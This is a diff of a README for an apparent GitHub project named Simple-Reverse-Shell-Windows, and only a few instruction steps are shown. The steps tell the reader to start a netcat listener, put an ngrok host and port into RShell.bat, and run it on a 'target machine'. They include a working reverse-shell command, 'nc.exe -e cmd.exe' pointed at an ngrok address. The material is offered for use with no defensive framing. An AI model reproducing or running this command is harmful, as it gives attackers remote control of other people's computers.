Mikusho/Simple-Reverse-Shell-Windows/README.md

   2. run netcat "nc -lvnp 6969"
   3. edit RShell.bat and put your ngrok ip and port, should be like this "....\\nc.exe -e cmd.exe 0.tcp.ngrok.io 27384"
   4. Then run RShell.bat on your target machine.

-     OR YOU CAN JUST COPY THE CODE AND PASTE ON CMD OR POWERSHELL IN YOUR TARGET MACHINE. :)
+     OR YOU CAN JUST COPY THE COMMAND AND PASTE ON CMD/POWERSHELL :)